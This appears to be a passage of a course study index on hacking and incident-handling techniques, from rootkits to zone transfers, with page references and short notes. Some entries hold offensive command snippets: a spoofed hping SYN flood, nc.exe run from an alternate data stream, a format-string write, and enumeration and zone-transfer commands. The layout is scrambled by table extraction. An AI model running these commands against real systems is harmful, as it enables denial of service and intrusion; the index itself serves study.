(Linux) 5 44 passwd & get root.
chkrootkit(link count,Binary),Rootkit Hunter,OSSEC-Rootcheck,chk for
Rootkit Detection tools Linux 5 65 inconsisten
Sophos Anti-Rootkit, McAfee Rootkit Detective, Rootkit Revealer, file
Rootkit Detection tools Windows 5 66 integrity tools
load rootkit in a folder & run with admin,all files, proc,netwk
Rootkit hiding 5 47 associated are hidden
injects exp.dll to exp.exe then hooks to iexp.dll for code.All saved in
Rootkit Hooking in Action 5 48 system 32
Rootkit Hunter 5 65
Rootkit Platform 5 42 Linux:Linux Rootkit 4,LKR5,LKR6,Solaris,BSD,AIX,HP-UX,IRIX,Windows
Round-Robin DNS 4 71 Round-robin dns records with 3-10 min ttl populated with
proxies.double flux
alter return pointers so program executes existing libs from legit OS sys
Return-Oriented Programming 3 123 code instead of the atkr code for the exploit. Used to avoid DEP (Data
(ROP) Execution Prevention - Windows).
rpcclient -U[username] [IP]> Establish a SMB session using SAMBA's
137, 145, 150, rpcclient from Linux; enumdonuser,enumalsgroups,lsaenumsid,srvinfo
rpcclient etc
enumdomusers, enumalsgroups, lsaenumsid, lookupsids, srvinfo
2
153-155, 157, lookupnames administrators,queryaliasmem builtin 544(default
rpcclient - group membership 162 RID),lookupsids..
rpcclient - groups and server info 154 enumalsgroups domain, enumalsgroups builtin. Srvinfo
rpcclient -u test IP enum>enumerate target information by logging in, srvinfo, queryuser, lookupname test
2 74 screenshot example ; Similar to Rubber Duckie
Rubber Duckie
3 5,6 USB sticks with auto-keyboards, download-run malware,steal…
runas 1 90 /user:Administrator cmd.exe
S Tools embeds data in BMP files using LSB, result is identical
S Tools - Detection compare to color table,more number of duplicate colors,color histogram different
S-Mail 5 148 hides data in .exe and DLL files
SAINT 2 119 tool for vulnerability scanner (comm basis)
4 19-22, 28 random number used to seed the crypto algorithm.
salt
5 173
3 18, 162
SAM database 5, 16, 20, 25,
4 28-29, 31
1 31
70, 137, 144-
Samba 2 145
4 51
samba daemon (smdb) 2 137
searches google for vuln version of phpBB script then attacked sys
Santy worm 2 42 running it
Sasser 4 55, ,57-59
1 68, 83
sc query
2 102 sq query-list of serivices/ sc stop [service]-stop service windows
scanf 3 103
Scapy packet crafting tool to build packets - python
Scareware 5 16 form of malware which uses social engineering to cause shock
62, 73, 86-87,
Scheduked Tasks 1 253
schtasks 1 73, 87
SearchDiggity 2 43
runs searches across multiple networks to speed up finding of info
SECEVENTS.EVTX 5 114
Setiri Periodically, running on a victim mchine, surfs to the connection broker using an invisible
. browser. Through the personal/network firewall and anonymizer using HTTPS
1 89
scpol.msc 5 45
6 33
Search Directives 2 37 "link:","site:","intitle:","related:","info:"
Search engine recon - automated 2 43 Bishop Fox's digity,recon-ng(target compromised accounts)punkspider
SMB protocol 2 138 L7 proto that implements file printer sharing,domain auth, rmt admin.
Sniffing Backdoor Defenses Pre:Keep atks off sys.Ide:look for weird traffic,proc &sniffers.ConEradRec:Backdoors;
. TLS1.2, hardcore ARP, SSHv2,Ipsec
Sniffing Backdoor Modes Promiscuous ; Non-Promiscuous
Sniffing Defenses Contain check other systems, remove shiffer prog, change pass, not prisc
Sniffing Defenses Indentif ifconfig, warning in browser,EtherARP, strange DNS query; arp -a/-e, look for arp
. manipulation, arpwatch, ipconfig /displaydns
Sniffing Passive & Active 3 44-68
Sniffit capture network traffic with GUI ; allow atkr to look at the data
SQL Parameterized stored prepared SQL code that you can save, so the code can be reused over and over again.
procedure in the web app SELECT FROM WHERE AND
1 96
SQL Slammer
4 55
SQLInject.nse 4 104
sqlmap 4 104
1 256
sshd 4 185-186, 188 .
5 43, 50
SSHmitm 3 63
SSID cloaking 2 60-61
2 68
SSLStrip
3 51, 67-68 strips the SSL from HTTPS; makes HTTP traffic look loke HTTPS
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce &
startup items (Windows) 1 69, 70, 86 RunOnceEX or wmic startup list full or C:/>dir /s /b
"C:Doc&settings[userName]\start Menu\" or msconfig.exe
start C:\tmp\test.txt:nc.exe 5 110 Executable in Alternative Data Stream
Stash (Stego) 5 148 Hides data in a veriety of image formats
Statically-linked binary a self-containment program that needs no external library
Steganography 5 147-156 Concealing data behind images,word,txt,CGI,JPEG
Steganography - How it works require host file,host can be genrated,hidden msg generates a file/hides in a file
Steganography - Generate new hidden msg can gen new file.used in CGI's.Eg input text used to gen fractals
file
Steganography - Types Injection, substitution(can lower quality of resulting file) and Generate a new file
Pre:learn stego tools,integrity check on webserver files.Ide:compare
Steganography Defenses 5 155 with original,hash
Ide:with HR&legal,involves monitoring victim&comparing to orig
Steganography Defenses 2 5 156 img.Con...:HR,legal
Steganography Defenses 3 use stegdetect
Steganography Example (Image - use substitution to change LSB with minimal impact in pixel color to human eye
LSB)
detects data hidden with Jsteg,Jphide,Invisible
Stegdetect 5 156 Secrets,Outguess,F5,Appendix..
Jsteg,MP3Stego,S-Mail(hide data in exe&dll),Invisible secrets(in
Stego Tools 5 148-149 ads),Hydayn:win,lin
Stego Vs Crypto Crypto:u know the data is being sent but can read it.Stego:u don’t know data is sent
StegExpose 5 154 Java utility detects stego lissless images LSB techniques
Strcpy 3 96, 103, 107
Stream Control Transmission Possible Cvrt Chnl, multiplexed and multi-streaming,sends data via
Protocol (SCTP) 5 132
multiple connections,multihoming,has built in C2 serv failover
Streams 5 106 tool for ADS, can delete streams, microsoft sysinternals
strncpy 3 96, 103, 107
8, 26, 55, 103-
111, 124, 128-
4 130, 136-137,
Structured Query Language (SQL) 141, 147, 150
64, 168-172,
5 174
3 65, 146
Stuxnet 4 55, 57-59, 64
5 55
causes CPU's instruction ptr to jump to a new location in memory to
Subroutines 3 98 run code
like Dsniff but nice GUI, can hijack also, can strip ssl or downgrade
Subterfuge 3 64 http,block VPN
Substitution (stego) data in host is subed with hidden msg.can lead to degrade.replace insignificant data
SubVert 5 58 VM based rootkit proof of concept
SucKIT 5 56, 65
sumfuq 5 50 originator of the Kernel-Mode rootkit
Supervisory Control And Data 3 11
Acquisition (SCADA) 4 58, 64
chkrootkit=check anomalies in rootkits,tripwire/AIDE integrity
supporting tools (linux) 1 258 chcker;fingerp files
Suterusu 5 71-74
1 249, 261
Switch User ID (SUID)
3 106
1 54 [S] - SYN ; [S.] - SYN/ACK ; [.] - ACK
2 25, 90, 93-95 Scan types; Half-open connection
3 36, 38 Firewalls can block invoming SYN's
SYN 154, 165, 167,
4 171, 175, 179-
180, 185-186
5 129-130 Covert_TCP modes
2 25, 90, 93-94
SYN-ACK
4 165, 185
SYN-flood 4 180 hping --syn --count 20 --spoof 10.10.11.11 -p 445 [target_machine
SYN Flood - Defenses 4 Pre: Linux Syn Cookies:ISNb=hash of secret nr,src IP&port,dest_ip&port+ISNa+time
SYN Flood - Exhausting Resources syn and don’t send ack,tie up all cons/use all bandwith,use unresponsive spoofed IP
SYS_execve 5 51, 53, 55
1 69, 77, 126, 141
Sysinternals
2 137
5 66, 106
3 162
SYSKEY
4 31 provides extra 128-bit encrytion of SAM db when stored in Registry
1 236 xvf X-extract V-verbose F-from file xvfz Z-unzip first before opening
tar file
5 94, 99 Lab:Shell History
tar / untar. Archives and 1 236 tar cvf ,tar xvf, tar cvfz, tar xvfz
compression
Taranis 3 acts like macof;sends eth frames to trick switch thich 1 MAC is simultan on 2 ports
1 81-83, 126
164-165, 167,
3 169, 173
Task Manager (tasklist)
4 177-178
5 27, 35
Tasklist | find /I /c "notepad.exe" 4 178 count the nr of processes named notepad.exe
Tasklist cmd can be run remotely 1 126 by psexec from Microsoft Systinternals. Ps in Linux
TCP 139 2 148 NetBIOS Session Service
TCP 22 4 185 SSH
2 89 SMB
TCP 445
4 179 SMB is always listening
TCP 5500 5 12 VNC listenin mode: server sends GUI via 5500 to client
TCP 5800 5 12 serves up a JAVA applet of a VNC viewer
TCP 5900 5 12 VNC active mode: server listening on TCP 5900 by default
TCP 6667 (IRC to control Bots 4 68 Bots can be controlled with IRC; one-to-many comm
TCP 80 2 89 Web Server HTTP
TCP and UDP ports 2 89 65536 for TCP and the same for UDP; TCP-tries to deliver messager;
UDP-mess may dropp
TCP control bits and 3 way
2 90 SYN,ACK,FIN,RESET,URG,PUSH
Handshake
1 54, 266 -nn 'port 27917' ; host10.10.75.1 & -> :LOG output
2 25,106 atkrs find conn systems by dumping DNS record; -i lo
Tcpdump ./tcpdump -n -s0 -w init.out port 80 & (-s0 Snap lengh unlimited, size
5 101, 141 of the packet to capture) tcpdump -I lo
-s0 -A host 10.10.75.1 | grep VIEWSTATE (-A include the ASCII from the
dump)
TCP header 2 91 src port, dest port, sequence nr, Ack nr, control bits
sends spoofed reser to both sides to kill connections,forcing re-
TcpKill 3 53 auth,grab auth
sends packets to slow down conversation so attacker can sniif in fast
TcpNice 3 53 connection
1 77 TCP & UDP
TCPView 2 101 Shows CURRENT traffic - GUI,; non-GUI version is TCPVcon
shows all TCP and UDP endpoints on Windows systems
tcptraceroute and Layer Four send pkts through a pkt filter device to determine which ports are
2 124
Traceroute open
computer&physical security,operations, Network Mgmt,Legal,HR,DR
Team (preparation) 1 30 etc
Define the IH team-onsite techies,comand post. Establish response
Team Organization 1 32 time baseline
Tardrop 4 154, 161 strangely fragmented packets that cause Dos
1 121
Tenable
2 119-120, 123
Ticketing tools 1 104 RTIR,CyberSPonse,Orion Live CD
Time Exceeded 2 83, 85
Tiny Fragment Attack first frag is tiny and carries part of offending traffic, second packet carries the rest
2 80, 84
Topology
6 32, 48
Traceroute How it works LINUX;1st pck with TTL=1,router decrements to 0 and send TTL
2 83
traditionally exceeded.2nd pck TTL=2
plan, set up tools,deploy honeypots,forensics image in multiple
Train the team 1 37 ways,unannounced pen test
2 46-47
transform
5 50, 148
1 193, 258
Tripwire
5 7, 50, 67
Truly Nasty Payload - Worms 4 64 Breeders consuming resource.Steals info fro sys.distribute bots.
Truman Analyze Malware-isolated env
Virtual Machine escape Breaking out of a VM and interacting with the Host Box
Virtual Network Computing Free cross-platform remote access suite.most AV don't catch cos also
5 9-14
(VNC) legit.
VirtualAllocEx 5 45 Allocate space in the victim process for DLL injection
Vmcat
IR's use vm to test and defend against attck.Malicous code can detect&destry VM's
VM detection
look for vme processes,memory,shifted interupt desc table,vme hdwr,proc intructns
VMcat not a true escape because it coordinates processes bw host & guest
VM Escape
Allow an attacker in a guest to execute code on the host; Vmcat
VM Escape Defenses patch.dont mix weak & strong systems/sensitive data with public,VM's are not FW's
vmlinuz 5 57 sored Kernel image, typically located in the /boot directory
VMware 3 77 MAC addresses beginning with 00.0c.29 are WMware
vmware machines (and 1 198 .vmx,nvram,.vmdk,.vmss,.vmsn
associated files)
vmware network options 1 202 host-only,bridged and Nat
Vmware networking watch-out 1 203 VMnet0- bridged; VMnet1- Host Only; VMnet8- NAT
vmware uses 1 197 IR,malware analysis,digital forensics,ethican and practice hacking
active:server listening on TCP 5900,listenin mode:server sends GUI via
VNC Active and Listening client 5 12 TCP 5500 to client
App mode(in tray),Service mode(in service list&tray after reboot),hide
VNC modes (WinVNC) 5 13 tray icon
18, 29, 53-58 war dialers dial a series of nrs, demon dialers brute force a single nr
war dialing and demon dialers 2 for passwds
Justify business need, coduct on org,check bills, evening office
moderm check
War Driving 2 18, 60-75
Iden:PBX Scaning,PBX IPS.Con:shutdown moderm.Erad:RM mod,chg nr
& passwd
war room 1 36 Secure room with copies of evidence,locking cabinet,no windows
Warhol 4 60-61 pre-scan internet,load worm into list, infect first vuln systems,spread
Web Application Attack Defenses Pre:use proxy to detect when inbound traffic is altered.Modsecurity,F5
4 150
2 ASM,citrix
Web Application Attack Defenses Ide:user complain.Con:shutdown app&fix/quarantine victim
4 151
3 acc.Era:remove data…
Web Application Attack and Web App Proxy - Python based, include MitM proxy for manipulating
4 146
Audit Framework (w3af) web apps (FREE)
Web Application Firewall (WAF) 4 101, 150
Web Application Manipulation 4 use proxy to maipulate data in transit,account nrs,balance,shopping cart prices etc
proxy
Web Attack Proxy tools 4 Fiddler,ZAP proxy,Burp Proxy,W3af,odysseus/Telemachus all manipulation proxy
Web based Recon/Attack Tools 2 50 Shodan,dnsstuff,traceroute.org,network-tools.com,securityspace.com
Wireless VPN crack 2 72 IKE crack and cain can break PSK with Ipsec in set to aggressive mode
1 43, 52
Wireshark - passive sniffer capture packets andcan process already captured files. Over 500
3 46, 131, 134
protocols
Witty 4 55, 57, 64
67, 70, 81-82,
1 126, 138, 188-
189, 192
wmic 2 102
4 177-178
26-27, 34-35,
5 110
Wmic /node:
1 126 look for unusual proc(works remotely)
[MachineName]/user[]/pass
wmic check usb and other 1 192 wmic diskdrive get interfacetype,mediatype,model
plugged interf
wmic get users loggedin 1 189 wmic computersystem get username
wmic get usrs loggedin all sys rmt 1 189 wmic /node:@systems.txt computersystem get username /format:csv
cmd
wmic on multiple systesms wmic /node:@systems.txt product get description,name .../format:csv > inv.txt
export to csv
Worms - Flash "Hockey stick"pre-scan internet,load worm into list, infect first vuln
Technique/Warhole 4 60 systems,spread
exponential,spread shape of a gold stick,Warhol 99% in 15mins,Flash
Worms - Fast Spreading 4 60 30seconds
change appearance and function e.g a malware that does DOS,steals
Worms - Metamorphic Worms 4 65 CC's,user ID's
may exploit multiple OS types ; In 2010 Stuxnet:windows & SCADA
Worms - Multiplatform 4 58 sys.IIS/Sadmind worm:Windows and solaris
dynamically change appearance each time they run; keeps the same
Worms - Polymorphic Worms 4 62 function
Worms - Truly Nasty Payload 4 64 Breeders consuming resource.Steals info fro sys.distribute bots.
Worms intro and History 4 53/55 automated attack tools that spread via networks
Pre:Buffover defense,test&deploy patches,encrypt
Worm and Bot Defenses 4 74 hdd.Id:AV.Con:Remov from netw
wrap a backdoor around some other app.Aka Binders.wrap exes into
Wrappers 5 18 backdoor. SaranWrap
Write Blocker 1 111 work with the Forensic image copy in a read-only manner
Writing to memory locations endian(inputs backwards),2 hex=1ascii,0xbffffac0=\xc0\xfa\xff\xbf\%d%n
wtmp (/var/log/wtmp) 5 89-90 contains data about past user logins
X-Ways Forensics 1 41 Forensics tool (Commercial)
3 97, 124, 144 Editing assembly PUSH, POP, MOVE. XOR itself=0
XOR
4 63 XORing evil code with a key
pulls data from network.Can be live or reviewing a capture
Xplico 3 55 (offline).Stores components
fingerprinting tool,better results than nmap but smaller sig DB,uses
xProbe2 2 95 fuzzy logic
XSS Shell setup webserver with XSS Shell, plant hook on vuln site, victim browser compromised
Yoda & Themida 5 19 packing tool to make executable dificult to anlyze
104, 146-147 supports chained proxies,stores html locally,import SSL client cert,test
ZAP Proxy 4 SQLi&Xss
Zenmapp 2 80, 84 GUI for Nmap
Zero-day Exploit worms 4 59 eg. Stuxnet exploited 4 zero-days in windows target machines
zgrep 1 155-156 uncompress Bro files
Zone Transfer 2 24-27 attacker grab a dump of DNS server records.Uses TCP 53
Zone Transfer Unix dig @[DNS_server_IP][target_domain] -t AXER
Zone Transfer Windows nslookup,server[sever],set type=any,ls -d [domain]. tcpdump -nn port 53 and host